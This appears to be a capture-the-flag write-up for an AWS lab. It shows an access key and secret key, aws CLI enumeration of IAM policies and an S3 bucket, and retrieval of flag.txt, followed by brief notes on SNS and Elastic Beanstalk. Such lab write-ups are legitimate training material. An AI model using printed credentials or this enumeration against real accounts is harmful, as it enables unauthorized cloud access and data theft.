Enumeration

Initial Access – AWS Credentials

Access key ID: AKIA3SFMDAPOWC2NR5LO
Secret access key : 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

Verify Access

└──╼ $aws sts get-caller-identity --profile iam_user 
{
    "UserId": "AIDA3SFMDAPOWFB7BSGME",
    "Account": "794929857501",
    "Arn": "arn:aws:iam::794929857501:user/dev01"
}

IAM Policy Enumeration

List Attached Managed Policies

└──╼ $aws iam list-attached-user-policies --user-name dev01 --profile iam_user 
{
    "AttachedPolicies": [
        {
            "PolicyName": "AmazonGuardDutyReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
        },
        {
            "PolicyName": "dev01",
            "PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
        }
    ]
}

• Attached Policies found:
  • AmazonGuardDutyReadOnlyAccess
  • dev01 (custom managed policy)

List Inline Policies

└──╼ $aws iam list-user-policies --user-name dev01 --profile iam_user 
{
    "PolicyNames": [
        "S3_Access"
    ]
}

• Inline Policy Found: S3_Access

View Inline Policy: S3_Access

└──╼ $aws iam get-user-policy --policy-name S3_Access --user-name dev01 --profile iam_user 
{
    "UserName": "dev01",
    "PolicyName": "S3_Access",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::hl-dev-artifacts",
                    "arn:aws:s3:::hl-dev-artifacts/*"
                ]
            }
        ]
    }
}

• Dev01 has access to s3 bucket called hl-dev-artifacts

S3 Bucket Enumeration

└──╼ $aws s3 ls s3://hl-dev-artifacts --profile iam_user
2023-10-01 16:39:53       1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 16:39:53     214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 16:38:05         32 flag.txt

• Found this user has access several documents and flag is found lets try to download the flag

Retrieve the Flag

└──╼ $aws s3 cp s3://hl-dev-artifacts/flag.txt . --profile iam_user 
download: s3://hl-dev-artifacts/flag.txt to ./flag.txt           
└──╼ $cat flag.txt 
Redactedc904551935c7514

• Flag: Redacted8545df0c904551935c7514`

We’re not done yet—time to dig into the managed policies and see what else we can uncover

Understanding AWS SNS (Simple Notification Service)

Amazon SNS is a fully managed messaging service that helps you send messages between applications or from applications to people. It supports two main types of messaging:

1. Application-to-Application (A2A) Notifications

This is useful when one app needs to talk to another. For example, if your website needs to send a message to a backend service when someone signs up, SNS can handle that. It helps connect and separate different parts of your app, so they work smoothly without being tightly linked.

AWS Elastic Beanstalk

Elastic Beanstalk is AWS’s Platform-as-a-Service (PaaS) for web applications and services—letting you deploy code and immediately handle the heavy lifting of capacity provisioning, load balancing, auto-scaling, application health monitoring and updates.

• Automated Infrastructure
  • Provisions EC2 instances, Load Balancers, and Auto Scaling Groups
  • Manages capacity, deployments (rolling, immutable, blue/green), health checks, and scaling rules

How it works
You simply upload your application code (Node.js, Python, Java, .NET, etc.), choose an execution platform, and Elastic Beanstalk orchestrates the underlying AWS resources. This streamlines deployments, abstracts away infrastructure complexity, and lets you focus squarely on your application logic.